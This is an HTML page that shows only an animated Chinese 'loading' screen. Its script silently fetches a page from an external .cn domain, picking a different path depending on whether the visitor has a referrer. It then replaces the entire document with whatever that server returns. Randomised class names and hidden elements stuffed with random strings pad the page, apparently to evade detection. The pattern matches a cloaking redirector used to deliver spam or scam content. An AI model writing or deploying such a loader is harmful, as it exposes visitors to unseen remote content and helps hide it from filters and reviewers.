<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .CvIpod {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .CvIpod .w1Pe0DAfwqM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .CvIpod .content {
            line-height: 50px;
            text-align: center
        }

        .CvIpod .img {
            width: 100%
        }

        .CvIpod .xJ4T7Riq {
            text-align: center
        }

        .CvIpod .xJ4T7Riq span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .CvIpod .xJ4T7Riq span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .CvIpod .xJ4T7Riq span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .CvIpod .xJ4T7Riq span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .CvIpod .xJ4T7Riq span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .CvIpod .xJ4T7Riq span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .CvIpod .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XRiXk0qls(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var QoX4uJD = XRiXk0qls('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ QoX4uJD +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ QoX4uJD +".html?a=share";
		}
		
        Ju3BllOe=url+"#"+new Date().getTime();
        Ju3BllOe && function() {
            $.get(Ju3BllOe, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >cZIC0Q777A2KzlzCHyCNHvBcxRgL36dIOQkPmLldCU4S0glR5yMJi15uy8IipbTCNVWxZm5fNWwM1GaZ</li>
<img  src='' style='display:none'>
<li style='display:none' >cZIC0Q777A2KzlzCHyCNHvBcxRgL36dIOQkPmLldCU4S0glR5yMJi15uy8IipbTCNVWxZm5fNWwM1GaZ</li>
<div style='display:none'>jqc2CDRdf2apTxrKKt9EfgZ497mBeoxPpUHAgFzXzE7SpXxyK3vrquuqIYCMub74Sq</div>
<img  src='' style='display:none'>
<h1 style='display:none' >f6nNHTCBe2PNffjBPXnxeSq77fUFbAet1Y2uapxL6TgV2puNRlZJHzMfYIHVdnOA5wUhWx</h1>
<h1 style='display:none' >f6nNHTCBe2PNffjBPXnxeSq77fUFbAet1Y2uapxL6TgV2puNRlZJHzMfYIHVdnOA5wUhWx</h1><div class="CvIpod">
    <div class="w1Pe0DAfwqM">
        <div class="xJ4T7Riq">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >bYriJMkR3Yp3BXhhixdQ661LQUiGQC6JkKKh65iiQccOtLQlp3w6R6gjOCiJzwGWNd7pOFANm</b>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>LLZf8B0aDKZtkXhpr2mbYVM2VWAHio4WJHJ3LItFFECBEnQ9Ke</a>
<li style='display:none' >uOgqyQypsVIFN6RMXuQgdYolQHBaMQgjpFMT1F1rQeBt2d6b097bOXOvD8R2AboF26XlbCt0QZvoqvG</li>
<div style='display:none'>T7kHVdjKyFBnfRz79wX1fS6oDNDF0NR4GrIxPBs16Lozkd8GVoGD6O2PqBV5</div></body>
</html>